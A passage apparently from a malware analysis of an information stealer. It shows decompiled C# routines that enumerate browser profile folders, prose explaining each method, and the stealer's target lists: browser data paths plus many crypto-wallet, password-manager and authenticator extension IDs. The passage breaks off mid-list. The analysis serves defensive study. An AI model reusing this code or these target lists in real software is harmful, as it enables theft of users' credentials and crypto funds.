bool flag2 = !list.Contains(fullName);
if (flag2)
{
FilveM.ptlg.Add(text);
list.Add(text);
}
}
}
catch
{
try
{
foreach (string path in FilveM.TrapBang)
{
bool flag3 = Directory.Exists(Path.Combine(test, path));
if (flag3)
{
foreach (string text2 in Directory.GetFiles(Path.Combine(test, path), searchPattern))
{
string fullName2 = new FileInfo(text2).Directory.FullName;
bool flag4 = !list.Contains(fullName2);
if (flag4)
{
FilveM.ptlg.Add(text2);
list.Add(text2);
}
}
}
}
}
catch
{
}
}
}
}
return FilveM.ptlg;
}
// Token: 0x06000020 RID: 32 RVA: 0x00003948 File Offset: 0x00001B48
public static List<string> LocTester(string test, string[] file)
{
List<string> list = new List<string>();
bool flag = Directory.Exists(test);
if (flag)
{
foreach (string searchPattern in file)
{
try
{
foreach (string item in Directory.GetFiles(test, searchPattern, SearchOption.AllDirectories))
{
bool flag2 = !list.Contains(item);
if (flag2)
{
list.Add(item);
}
}
}
catch
{
try
{
foreach (string path in FilveM.TrapBang)
{
bool flag3 = Directory.Exists(Path.Combine(test, path));
if (flag3)
{
foreach (string item2 in Directory.GetFiles(Path.Combine(test, path), searchPattern))
{
bool flag4 = !list.Contains(item2);
if (flag4)
{
list.Add(item2);
}
}
}
}
}
catch
{
}
}
}
}
return list;
}
// Token: 0x06000021 RID: 33 RVA: 0x00003A88 File Offset: 0x00001C88
public static string CGN(string path)
{
try
{
string[] array = path.Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
bool flag = array[array.Length - 2].Contains("User Data");
bool flag2 = flag;
if (flag2)
{
return array[array.Length - 1];
}
}
catch
{
}
return "Unknown";
}
// Token: 0x06000022 RID: 34 RVA: 0x00003AF0 File Offset: 0x00001CF0
public static string ChrRm(string path)
{
try
{
return path.Split(new string[]
{
"AppData\\Roaming\\"
}, StringSplitOptions.RemoveEmptyEntries)[1].Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries)[0];
}
catch
{
}
return string.Empty;
}
// Token: 0x06000023 RID: 35 RVA: 0x00003B4C File Offset: 0x00001D4C
public static string ChrLm(string path)
{
try
{
string[] array = path.Split(new string[]
{
"AppData\\Local\\"
}, StringSplitOptions.RemoveEmptyEntries)[1].Split(new char[]
{
'\\'
}, StringSplitOptions.RemoveEmptyEntries);
return array[0] + "_[" + array[1] + "]";
}
catch
{
}
return string.Empty;
}
// Token: 0x04000008 RID: 8
public static string[] TrapBang = new string[]
{
"Default",
"Profile 1",
"Profile 2",
"Profile 3",
"Profile 4",
"Profile 5",
"Profile 6",
"Profile 7",
"Profile 8",
"Profile 9",
"Profile 10",
"Profile 11"
};
// Token: 0x04000009 RID: 9
public static List<string> ptlg = new List<string>();
}
}DirTester(string test, string[] file):
- This method searches for files in the given
testdirectory and its subdirectories using the file patterns specified in thefilearray. - It adds the found files to a list (
ptlg), ensuring that the same directory isn't added multiple times. - If the initial search fails, it checks certain predefined subdirectories (
TrapBangarray) and searches for files there. - Returns a list of found files (
ptlg).
LocTester(string test, string[] file):
- Similar to
DirTester, this method searches for files in a directory (test) and its subdirectories using file patterns in thefilearray. - Instead of adding directory names, it directly adds file paths to the list and returns this list.
- It also attempts searching in subdirectories if the initial search fails.
CGN(string path):
- This method takes a file path as input and checks if the second-to-last directory in the path contains “User Data”.
- If so, it returns the name of the last directory in the path (which could represent a user profile or data directory).
- If the condition is not met, it returns “Unknown”.
ChrRm(string path):
- Extracts the part of the file path that comes after “AppData\Roaming\” and returns the first directory following that path segment.
- This could be useful for identifying specific user-related directories in the
Roamingfolder.
ChrLm(string path):
- Extracts the part of the file path that comes after “AppData\Local\”.
- It returns a string formatted as
"[folder1]_[folder2]"based on the first two directories afterAppData\\Local. - This method is likely used to differentiate between different user profiles or settings within the
Localdirectory.
Fields:
TrapBang:- An array of predefined folder names, likely representing different user profiles (e.g.,
Profile 1,Profile 2, etc.). - Used as fallback locations when the initial search fails.
ptlg:- A static list that holds the file paths found by the
DirTestermethod.
Data harvesting
The stealer harvests these paths of user data for various Mozilla-based applications like Firefox, Thunderbird, and Pale Moon, as well as some lesser-known browsers like K-Meleon and Cyberfox. These paths are typically found in the user’s AppData folder under Roaming.
"%PAPAGEY%\\AppData\\Roaming\\Mozilla\\Firefox",
"%PAPAGEY%\\AppData\\Roaming\\Waterfox",
"%PAPAGEY%\\AppData\\Roaming\\K-Meleon",
"%PAPAGEY%\\AppData\\Roaming\\Thunderbird",
"%PAPAGEY%\\AppData\\Roaming\\Comodo\\IceDragon",
"%PAPAGEY%\\AppData\\Roaming\\8pecxstudios\\Cyberfox",
"%PAPAGEY%\\AppData\\Roaming\\NETGATE Technologies\\BlackHaw",
"%PAPAGEY%\\AppData\\Roaming\\Moonchild Productions\\Pale Moon",
"%PAPAGEY%\\AppData\\Roaming\\Ghostery Browser\\Profiles",
"%PAPAGEY%\\AppData\\Roaming\\Undetectable\\Profiles",
"%PAPAGEY%\\AppData\\Roaming\\Sielo\\profiles",
"%PAPAGEY%\\AppData\\Roaming\\Waterfox\\Profiles",
"%PAPAGEY%\\AppData\\Roaming\\conkeror.mozdev.org\\conkeror",
"%PAPAGEY%\\AppData\\Roaming\\Netscape\\Navigator",
"%PAPAGEY%\\AppData\\Roaming\\Mozilla\\SeaMonkey",
"%PAPAGEY%\\AppData\\Roaming\\FlashPeak\\SlimBrowser",
"%PAPAGEY%\\AppData\\Roaming\\Avant Profiles",
"%PAPAGEY%\\AppData\\Roaming\\Flock"then, gets the data from paths for various Chromium-based browsers, including Google Chrome, Opera, Brave, and other alternatives like Vivaldi and Yandex. It also lists directories for gaming and other software, indicating where user data might be stored locally.
"%PAPAGEY%\\AppData\\Local\\Battle.net",
"%PAPAGEY%\\AppData\\Local\\Google\\Chrome\\User Data",
"%PAPAGEY%\\AppData\\Local\\Google(x86)\\Chrome\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Opera Software\\Opera GX Stable",
"%PAPAGEY%\\AppData\\Roaming\\Opera Software\\Opera Stable",
"%PAPAGEY%\\AppData\\Local\\Microsoft\\Edge\\User Data",
"%PAPAGEY%\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Chromium\\User Data",
"%PAPAGEY%\\AppData\\Local\\Slimjet\\User Data",
"%PAPAGEY%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data",
"%PAPAGEY%\\AppData\\Local\\Iridium\\User Data",
"%PAPAGEY%\\AppData\\Local\\7Star\\7Star\\User Data",
"%PAPAGEY%\\AppData\\Local\\CentBrowser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Chedot\\User Data",
"%PAPAGEY%\\AppData\\Local\\Vivaldi\\User Data",
"%PAPAGEY%\\AppData\\Local\\Kometa\\User Data",
"%PAPAGEY%\\AppData\\Local\\Elements Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Epic Privacy Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\uCozMedia\\Uran\\User Data",
"%PAPAGEY%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer",
"%PAPAGEY%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data",
"%PAPAGEY%\\AppData\\Local\\Coowon\\Coowon\\User Data",
"%PAPAGEY%\\AppData\\Local\\liebao\\User Data",
"%PAPAGEY%\\AppData\\Local\\QIP Surf\\User Data",
"%PAPAGEY%\\AppData\\Local\\Orbitum\\User Data",
"%PAPAGEY%\\AppData\\Local\\Comodo\\Dragon\\User Data",
"%PAPAGEY%\\AppData\\Local\\Amigo\\User\\User Data",
"%PAPAGEY%\\AppData\\Local\\Torch\\User Data",
"%PAPAGEY%\\AppData\\Local\\Yandex\\YandexBrowser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Comodo\\User Data",
"%PAPAGEY%\\AppData\\Local\\360Browser\\Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Maxthon3\\User Data",
"%PAPAGEY%\\AppData\\Local\\K-Melon\\User Data",
"%PAPAGEY%\\AppData\\Local\\Sputnik\\Sputnik\\User Data",
"%PAPAGEY%\\AppData\\Local\\Nichrome\\User Data",
"%PAPAGEY%\\AppData\\Local\\CocCoc\\Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\Uran\\User Data",
"%PAPAGEY%\\AppData\\Local\\Chromodo\\User Data",
"%PAPAGEY%\\AppData\\Local\\Mail.Ru\\Atom\\User Data",
"%PAPAGEY%\\AppData\\Local\\Steam",
"%PAPAGEY%\\AppData\\Local\\CryptoTab Browser",
"%PAPAGEY%\\AppData\\Local\\MapleStudio\\ChromePlus",
"%PAPAGEY%\\AppData\\Local\\Coowon\\Coowon",
"%PAPAGEY%\\AppData\\Local\\GhostBrowser",
"%PAPAGEY%\\AppData\\Local\\BitTorrent\\Maelstrom",
"%PAPAGEY%\\AppData\\Local\\Min\\User Data",
"%PAPAGEY%\\AppData\\Local\\Kinza\\User Data",
"%PAPAGEY%\\AppData\\Local\\Globus VPN\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Falkon\\Profiles",
"%PAPAGEY%\\AppData\\Local\\Element Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\ColibriBrowser",
"%PAPAGEY%\\AppData\\Local\\Naver\\Naver Whale\\User Data",
"%PAPAGEY%\\AppData\\Local\\AVAST Software\\Browser\\User Data",
"%PAPAGEY%\\AppData\\Local\\UCBrowser\\User Data_i18n",
"%PAPAGEY%\\AppData\\Local\\Maxthon\\User Data",
"%PAPAGEY%\\AppData\\Local\\Blisk\\User Data",
"%PAPAGEY%\\AppData\\Local\\AOL\\AOL Shield\\User Data",
"%PAPAGEY%\\AppData\\Local\\Baidu\\BaiduBrowser\\User Data",
"%PAPAGEY%\\AppData\\Local\\CCleaner Browser\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Hola\\chromium_profile",
"%PAPAGEY%\\AppData\\Local\\360Chrome\\Chrome\\User Data",
"%PAPAGEY%\\AppData\\Local\\BraveSoftware\\Brave-Browser-Nightly\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\Lulumi-browser",
"%PAPAGEY%\\AppData\\Local\\Xvast\\User Data",
"%PAPAGEY%\\AppData\\Roaming\\kingpinbrowser",
"%PAPAGEY%\\AppData\\Local\\Tencent\\QQBrowser\\User Data"then, gets the data from crypto wallets if they exist from this list:
"cgeeodpfagjceefieflmdfphplkenlfk|EVER Wallet",
"acmacodkjbdgmoleebolmdjonilkdbch|Rabby",
"nhnkbkgjikgcigadomkphalanndcapjk|Clover Wallet",
"cnmamaachppnkjgnildpdmkaakejnhae|Auro Wallet",
"jojhfeoedkpkglbfimdfabpdfjaoolaf|Polymesh Wallet",
"nknhiehlklippafakaeklbeglecifhad|Nabox Wallet",
"ookjlbkiijinhpmnjffcofjonbfbgaoc|Temple",
"dkdedlpgdmmkkfjabffeganieamfklkm|Cyano Wallet",
"cihmoadaighcejopammfbmddcmdekcje|LeafWallet",
"lodccjjbdhfakaekdiahmedfbieldgik|DAppPlay",
"ijmpgkjfkbfhoebgogflfebnmejmfbml|BitClip",
"onofpnbbkehpmmoabgpcpmigafmmnjhl|Nash Extension",
"bcopgchhojmggmffilplmbdicgaihlkp|Hycon Lite Client",
"klnaejjgbibmhlephnhpmaofohgkpgkd|ZilPay",
"algblmhagnobbnmakepomicmfljlbehg|ADS Wallet",
"jccapkebeeiajkkdemacblkjhhhboiek|Crust Wallet",
"agechnindjilpccclelhlbjphbgnobpf|Fractal Wallet",
"jnldfbidonfeldmalbflbmlebbipcnle|Bitfinity Wallet",
"jblndlipeogpafnldhgmapagcccfchpi|Kaikas",
"bkklifkecemccedpkhcebagjpehhabfb|MetaWallet",
"ifckdpamphokdglkkdomedpdegcjhjdp|ONTO Wallet",
"icblpoalghoakidcjiheabnkijnklhhe|PIP",
"cfbfdhimifdmdehjmkdobpcjfefblkjm|Plug",
"epapihdplajcdnnkdeiahlgigofloibg|Sender Wallet",
"pocmplpaccanhmnllbbkpgfliimjljgo|Slope Wallet",
"mfhbebgoclkghebffdldpobeajmbecfk|StarMask",
"fgkaeeikaoeiiggggbgdcjchmdfmamla|Vtimes",
"odaegfdpkolgbdaeibcebmibmibchbce|WaykiMax",
"ppdadbejkmjnefldpcdjhnkpbjkikoip|Oasis Wallet",
"fcckkdbjnoikooededlapcalpionmalo|MOBOX WALLET",
"nphplpgoakhhjchkkhmiggakijnkhfnd|TON WALLET",
"ckelpdlfgochnkdgikcgbimdcfgpkhgk|Theta Wallet",
"bofddndhbegljegmpmnlbhcejofmjgbn|eckoWALLET",
"bgjogpoidejdemgoochpnkmdjpocgkha|Ecto Wallet",
"dlcobpjiigpikoobohmabehhmhfoodbb|Argent X StarkNet Wallet",
"kfdniefadaanbjodldohaedphafoffoh|Typhon Wallet",
"mapbhaebnddapnmifbbkgeedkeplgjmf|Biport Wallet",
"jkoeaghipilijlahjplgbfiocjhldnap|Mask Network",
"agkfnefiabmfpanochlcakggnkdfmmjd|Earth Wallet",
"pnndplcbkakcplkjnolgbkdgjikjednm|Tron Wallet & Explorer",
"jiidiaalihmmhddjgbnbgdfflelocpak|Bitget Wallet (formerly BitKeep)",
"cmndjbecilbocjfkibfbifhngkdmjgog|Swash",
"lpilbniiabackdjcionkobglmddfbcjo|Waves Keeper",
"ammjpmhgckkpcamddpolhchgomcojkle|Scatter",
"bopcbmipnjdcdfflfgjdgdjejmgpoaab|BlockWallet",
"kkilomkmpmkbdnfelcpgckmpcaemjcdh|CeloExtensionWallet",
"aholpfdialjgjfhomihkjbmgjidlcdno|Exodus Web3 Wallet",
"jnlgamecbpmbajjfhmmmlhejkemejdma|Braavos (StarkNet) Wallet",
"mcohilncbfahbmgdjkbpemcciiolgcge|OKX Web3 Wallet",
"phkbamefinggmakgklpkljjmgibohnba|Pontem Wallet",
"ejjladinnckdgjemekebdpeokbikhfci|Petra Wallet",
"efbglgofoippbgcjepnhiblaibcnclgk|Martian Wallet",
"cjmkndjhnagcfbpiemnkdpomccnjblmj|Finnie Wallet",
"aijcbedoijmgnlmjeegjaglmepbmpkpi|Leap Terra",
"hnhobjmcibchnmglfbldbfabcgaknlkj|Flint Wallet",
"opcgpfmipidbgpenhmajoajpbobppdil|Sui Wallet",
"hpclkefagolihohboafpheddmmgdffjm|Flow Wallet (formerly Lilico)",
"eajafomhmkipbjmfmhebemolkcicgfmd|Taho",
"gmcpomojcoaopogcbhpchfpdpfaabihc|BeFi Wallet",
"ejehodfgjhiadihgjdkgffciiepfdeep|FINX Wallet",
"bocpokimicclpaiekenaeelehdjllofo|XDCPay",
"eokbbaidfgdndnljmffldfgjklpjkdoi|Fluent",
"cflgahhmjlmnjbikhakapcfkpbcmllam|Ale",
"jnkelfanjkeadonecabehalmbgpfodjm|Goby",
"gkeelndblnomfmjnophbhfhcjbcnemka|Bitverse Wallet (formerly Teleport)",
"egjidjbpglichdcondbcbdnbeeppgdph|Trust Wallet",
"lgmpcpglpngdoalbgeoldeajfclnhafa|SafePal Wallet",
"fcfcfllfndlomdhbehjjcoimbgofdncg|Leap Cosmos Wallet",
"ebfidpplhabeedpnhjnobghokpiioolj|Fewcha Move Wallet",
"hbbgbephgojikajhfbomhlmmollphcad|Rise - Aptos Wallet",
"nngceckbapebfimnlniiiahkandclblb|Bitwarden - Free Password Manager",
"oboonakemofpalcgghocfoadofidjkkk|KeePassXC-Browser",
"dphoaaiomekdhacmfoblfblmncpnbahm|ChromeKeePass",
"mmhlniccooihdimnnjhamobppdhaolme|Kee - Password Manager",
"kmcfomidfpdkfieipokbalgegidffkal|Enpass Password Manager",
"fmhmiaejopepamlcjkncpgpdjichnecm|KeePass Tusk - Password Access",
"jgnfghanfbjmimbdmnjfofnbcgpkbegj|KeePassHelper Password Manager",
"lgbjhdkjmpgjgcbcdlhkokkckpjmedgc|DualSafe Password Manager",
"pnlccmojcmeohlpggmfnbbiapkmbliob|RoboForm Password Manager",
"hdokiejnpimakedhajhdlcegeplioahd|LastPass: Free Password Manager",
"hifafgmccdpekplomjjkcfgodnhcellj|Crypto.com",
"fpkhgmpbidmiogeglndfbkegfdlnajnf|Cosmostation Wallet",
"ckklhkaabbmdjkahiaaplikpdddkenic|Internet Money - Crypto Wallet",
"hoighigmnhgkkdaenafgnefkcmipfjon|EO.Finance: Crypto & Fiat Wallet",
"kilnpioakcdndlodeeceffgjdpojajlo|Aurox Wallet",
"icpikagpkkbldbfjlbefnmmmcohbjije|Z3US",
"onhogfjeacnfoofkfgppdlbmlmnplgbn|SubWallet - Polkadot",
"gjagmgiddbbciopjhllkdnddhcglnemk|Hashpack",
"nbdpmlhambbdkhkmbfpljckjcmgibalo|Halo Wallet (formerly KuCoin)",
"mcbigmjiafegjnnogedioegffbooigli|Ethos Sui Wallet",
"jkjgekcefbkpogohigkgooodolhdgcda|Pay with BitPay",
"fiikommddbeccaoicoejoniammnalkfa|Nightly",
"iokeahhehimjnekafflcihljlcjccdbe|Alby - Bitcoin",
"idnnbdplmphpflfnlkomgpfbpcgelopg|Xverse Wallet",
"bgpipimickeadkjlklgciifhnalhdjhe|GeroWallet",
"hpbgcgmiemanfelegbndmhieiigkackl|Monsta Wallet",
"jnmbobjmhlngoefaiojfljckilhhlhcj|OneKey",
"fijngjgcjhjmmpcmkeiomlglpeiijkld|Talisman - Polkadot Wallet",
"agoakfejjabomempkjlepdflaleeobhb|Core - Crypto & NFT Wallet",
"pgiaagfkgcbnmiiolekcfmljdagdhlcm|Stargazer Wallet",
"kkpllkodjeloidieedojogacfhpaihoh|Enkrypt Wallet",
"mmclamjkknobggpiohfneimmnlggagok|LEDGIS Wallet",
"ocjobpilfplciaddcbafabcegbilnbnb|XPLA Vault Wallet",
"bhhhlbepdkbapadjdnnojkbgioiodbic|Solflare Wallet",
"kmhcihpebfmpgmihbkipmjlmmioameka|Eternl",
"aiaghdjafpiofpainifbgfgjfpclngoh|Safeheron",
"pfdaepphglddodhkmcfoefimbcnkipmn|Spot wallet",
"imeelmcnggkkokgfhinnjhjfilibhpaj|SimpleHold",
"apnehcjmnengpnmccpaibjmhhoadaico|CWallet",
"gjlmehlldlphhljhpnlddaodbjjcchai|Nautilus Wallet",
"ilhaljfiglknggcoegeknjghdgampffk|Beam Web Wallet",
"jbkgjmpfammbgejcpedggoefddacbdia|Parallel wallet",
"loinekcabhlmhjjbocijdoimmejangoa|Glass wallet - Sui wallet",
"khpkpbbcccdmmclmpigdgddabeilkdpd|Suiet - Sui Wallet",
"heefohaffomkkkphnlpohglngmbcclhi|Morphis Wallet",
"mfgccjchihfkkindfppnaooecgfneiii|TokenPocket",
"cnncmdhjacpkmjmkcafchppbnpnhdmon|HAVAH Wallet",
"gjkdbeaiifkpoencioahhcilildpjhgh|partisia-wallet",
"lnaackabbghipdbjfhdhjempeiopmpop|SwappID",
"bmabahhenimmnfijaiccmonalfhpcndh|Relation ONE",
"inlfbeejfdgkknpiodhemfcokbdgofja|DeNet",
"ojbcfhjmpigfobfclfflafhblgemeidi|Glow - Solana Wallet BETA",
"emeeapjkbcbpbpgaagfchmcgglmebnen|Surf Wallet",
"ajkifnllfhikkjbjopkhmjoieikeihjb|Moso: Shop and Earn Crypto",
"aflkmfhebedbjioipglgcbcmnbpgliof|Backpack",
"eegcfalgkkhehkhbjbggbhhlcnckadih|Jellywallet",
"gpnihlnnodeiiaakbikldcihojploeca|NuFi",
"pcndjhkinnkaohffealmlmhaepkpmgkb|Meteor Wallet",
"hfljlochmlccoobkbcgpmkpjagogcgpk|Solana Wallet",
"enabgbdfcbaehmbigakijjabdpdnimlg|Manta Wallet",
"fghhpjoffbgecjikiipbkpdakfmkbmig|IDriss",
"mmmjbcfofconkannjonfmjjajpllddbg|Fluvi Wallet",
"kbdcddcmgoplfockflacnnefaehaiocb|Shell Wallet",
"anokgmphncpekkhclmingpimjmcooifb|Compass Wallet for Sei",
"dbgnhckhnppddckangcjbkjnlddbjkna|Fin Wallet For Sei",
"feejiigddaafeojfddjjlmfkabimkell|Bitski",
"bifidjkcdpgfnlbcjpdkdcnbiooooblg|Fuelet Wallet",
"abjfbanhppgiflmobebfffbijcfoeiao|Kontos",
"klghhnkeealcohjjanjjdaeeggmfmlpl|Zerion: Wallet for Web3 & NFTs",
"ahidmapichficbkfglbhgmhjcojjmlnm|KEKKAI",
"dldjpboieedgcmpkchcjcbijingjcgok|Fuel Wallet",
"fopmedgnkfpebgllppeddmmochcookhc|Suku Wallet",
"kglcipoddmbniebnibibkghfijekllbl|Fire",
"lmkncnlpeipongihbffpljgehamdebgi|DPal:Wallet for DogeCoin",
"keenhcnmdmjjhincpilijphpiohdppno|5irechain Wallet",
"ojbpcbinjmochkhelkflddfnmcceomdi|Zecrey",
"ppbibelpcjmhbdihakflkdcoccbgbkpo|UniSat Wallet",
"coefgobimbelhfmhkpndlddjhkphgnep|OrdinalSafe",
"ojggmchlghnjlapmfbnjholfjkiidbch|Venom Wallet",
"jallplgmgfjfgfhplcnbcpjbpijmgdnc|Wave Wallet",
"ghpilmjholiicaobfjdkefcogmgaabif|Goblin Wallet",
"ldinpeekobnhjjdofggfgjlcehhmanlj|Leather",
"papngmkmknnmfhabbckobgfpihpdgplk|BearBy",
"nhbicdelgedinnbcidconlnfeionhbml|Begin Wallet",
"gafhhkghbfjjkeiendhlofajokpaflmk|Lace",
"abogmiocnneedmmepnohnhlijcjpcifd|Blade Wallet",
"gdokollfhmnbfckbobkdbakhilldkhcj|Alephium Wallet",
"gadbifgblmedliakbceidegloehmffic|Paragon Wallet",
"fbeiiganbeffhobegddakpmplljhmfnd|Sparrow Ubiq Wallet",
"fcjkomdnccnlklmhncgmaehaakjkddnk|Samara Wallet",
"mjgkpalnahacmhkikiommfiomhjipgjn|Reef Chain Wallet",
"adganlhbinonbpfiehjjpmklkbghkaio|SendWallet",
"jiepnaheligkibgcjgjepjfppgbcghmp|Doge Labs Wallet",
"ionnbdlogiaapopodiglgaakhiifihcl|Kayros Wallet",
"elalghlhoepcjfaedkcmjolahamlnjcp|Bitgreen Wallet",
"ocjdpmoallmgmjbbogfiiaofphbjgchh|ELLI Suit Wallet",
"einnioafmpimabjcddiinlhmijaionap|ArConnect Wallet",
"fmblappgoiilbgafhjklehhfifbdocee|Forbole X",
"nhlnehondigmgckngjomcpcefcdplmgc|Fearless Wallet",
"ginchbkmljhldofnbjabmeophlhdldgp|PolkaGate",
"ahcefhodjjnpmeeaghfhocjiicghdcbn|4thTech Wallet",
"jcacnejopjdphbnjgfaaobbfafkihpep|Hive Keychain Wallet",
"gbjepgaebckfidagpfeioimheabiohmg|ZEON Wallet",
"odpnjmimokcmjgojhnhfcnalnegdjmdn|YETI Wallet",
"abamjefkidngfegdjbmffdmbgjgpaobf|Doter Wallet",
"oohllogfdpaojikdjjkfmklabefnkkfk|Jigstack Wallet",
"eamiofncoknfkefhlkdblngblpffehek|Verto Wallet",
"kkpllbgjhchghjapjbinnoddmciocphm|Ninji Wallet",
"mopnmbcafieddcagagdcbnhejhlodfdd|Polkadot.js Wallet",
"lccbohhgfkdikahanoclbdmaolidjdfl|Wigwam Wallet",
"nlobpakggmbcgdbpjpnagmdbdhdhgphk|Shiba Wallet",
"nlgnepoeokdfodgjkjiblkadkjbdfmgd|Multi Wallet",
"kppfdiipphfccemcignhifpjkapfbihd|Frontier wallet",
"nopnfnlbinpfoihclomelncopjiioain|Viction Wallet",
"nbdhibgjnjpnkajaghbffjbkcgljfgdi|Ramper Wallet",
"panpgppehdchfphcigocleabcmcgfoca|Desig Wallet",
"bkgplkpdgidlgmnlhdfakhcjfpfgjjkb|Ancient8 Wallet",
"eomhlheglneofffmbfjflldlbcnhpkpb|TronBoss",
"inlkhilmjmjomfcpdifpfgllhhlpnbej|UniElon",
"ghlmndacnhlaekppcllcpcjjjomjkjpg|Wizz Wallet",
"jbppfhkifinbpinekbahmdomhlaidhfm|iWallet Pro",
"ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet",
"ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink",
"jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet",
"nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask",
"afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet",
"hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase",
"fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain",
"odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet",
"hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet",
"blnieiiffboillknjnepogjhkgnoapac|EqualWallet",
"cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty",
"fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet",
"kncchdigobghenbbaddojjnnaogfppfj|iWallet",
"amkmjjmmflddogmhpjloimipbofnfjih|Wombat",
"fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet",
"nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx",
"nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet",
"nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet",
"fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet",
"aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation",
"fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet",
"aeachknmefphepccionboohckonoeemg|Coin98Wallet",
"pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain",
"bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom",
"mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet",
"aodkkagnadcbobfpggfnjeongemjbjca|BoltX",
"kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet",
"hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet",
"lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet",
"dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet",
"ejbalbakoplchlghecdalmeeeajnimhm|MetaMask Edge",
"mlbafbjadjidklbhgopoamemfibcpdfi|GoblinWallet",
"bhghoamapcdpbohphigoooaddinpkbai|Authenticator",
"oeljdldpnmdbchonielidgobddffflal|EOS Authenticator",
"naepdomgkenhinolocfifgehidddafch|BrowserPass",
"bmikpgodpkclnkgmnpphehdgcimmided|MYKI",
"jhfjfclepacoldmjmkmdlmganfaalklb|Splikity",
"chgfefjpcobfbnpmiokfjjaglahmnded|CommonKey",
"igkpcodhieompeloncfnbekccinhapdb|Zoho Vault",
"admmjipmmciaobhojoghlmleefbicajg|Norton Password Manager",
"caljgklbbfbcjjanaijlacgncafpegll|Avira Password Manager",
"imloifkgjagghnncjkhggdhalmcnfklk|Trezor Password Manager",
"cphhlgmgameodnhkjdmkpanlelnlohao|NeoLine",
"dmkamcknogkgcdfhhbddcghachkejeap|Keplr",
"fhmfendgdocmcbmfikdcogofphimnkno|Sollet",
"flpiciilemghbmfalicajoolhkkenfel|ICONex",
"hcflpincpppdclinealmandijcmnkbgn|KHC",
"mnfifefkajgofkcjkemidiaecocnkjeh|TezBox",
"nlgbhdfgdhgbiamfdfmbikcdghidoadd|Byone",
"ilbbpajmiplgpehdikmejfemfklpkmke|OneKey",
"pknlccmneadmjbkollckpblgaaabameg|Trust Wallet",
"pfknkoocfefiocadajpngdknmkjgakdg|MetaWallet",
"fcglfhcjfpkgdppjbglknafgfffkelnm|Guarda Wallet",
"idkppnahnmmggbmfkjhiakkbkdpnmnon|Exodus",
"mhonjhhcgphdphdjcdoeodfdliikapmj|Jaxx Liberty",
"bhmlbgebokamljgnceonbncdofmmkedg|Atomic Wallet",
"hieplnfojfccegoloniefimmbfjdgcgp|Electrum",
"pidhddgciaponoajdngciiemcflpnnbg|Mycelium",
"blbpgcogcoohhngdjafgpoagcilicpjh|Coinomi",
"gflpckpfdgcagnbdfafmibcmkadnlhpj|GreenAddress",
"doljkehcfhidippihgakcihcmnknlphh|Edge",
"nbokbjkelpmlgflobbohapifnnenbjlh|BRD",
"apjdnokplgcjkejimjdfjnhmjlbpgkdi|Samourai Wallet",
"ieedgmmkpkbiblijbbldefkomatsuahh|Copay",
"jifanbgejlbcmhbbdbnfbfnlmbomjedj|Bread",
"dojmlmceifkfgkgeejemfciibjehhdcl|KeepKey",
"jpxupxjxheguvfyhfhahqvxvyqthiryh|Trezor",
"pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln|Ledger Live",
"hbpfjlflhnmkddbjdchbbifhllgmmhnm|Ledger Wallet",
"ocmfilhakdbncmojmlbagpkjfbmeinbd|Bitbox",
"dbhklojmlkgmpihhdooibnmidfpeaing|Digital Bitbox",
"mammpjaaoinfelloncbbpomjcihbkmmc|YubiKey",
"khcodhlfkpmhibicdjjblnkgimdepgnd|Google Authenticator",
"bfbdnbpibgndpjfhonkflpkijfapmomn|Microsoft Authenticator",
"gjffdbjndmcafeoehgdldobgjmlepcal|Authy",
"eidlicjlkaiefdbgmdepmmicpbggmhoj|Duo Mobile",
"bobfejfdlhnabgglompioclndjejolch|OTP Auth",
"elokfmmmjbadpgdjmgglocapdckdcpkn|FreeOTP",
"ppdjlkfkedmidmclhakfncpfdmdgmjpm|Aegis Authenticator",
"cfoajccjibkjhbdjnpkbananbejpkkjb|LastPass Authenticator",
"flikjlpgnpcjdienoojmgliechmmheek|Dashlane",
"gofhklgdnbnpcdigdgkgfobhhghjmmkj|Keeper",
"hppmchachflomkejbhofobganapojjol|RoboForm",
"lbfeahdfdkibininjgejjgpdafeopflb|KeePass",
"kgeohlebpjgcfiidfhhdlnnkhefajmca|KeePassXC",
"inljaljiffkdgmlndjkdiepghpolcpki|Bitwarden",
"njgnlkhcjgmjfnfahdmfkalpjcneebpl|NordPass",
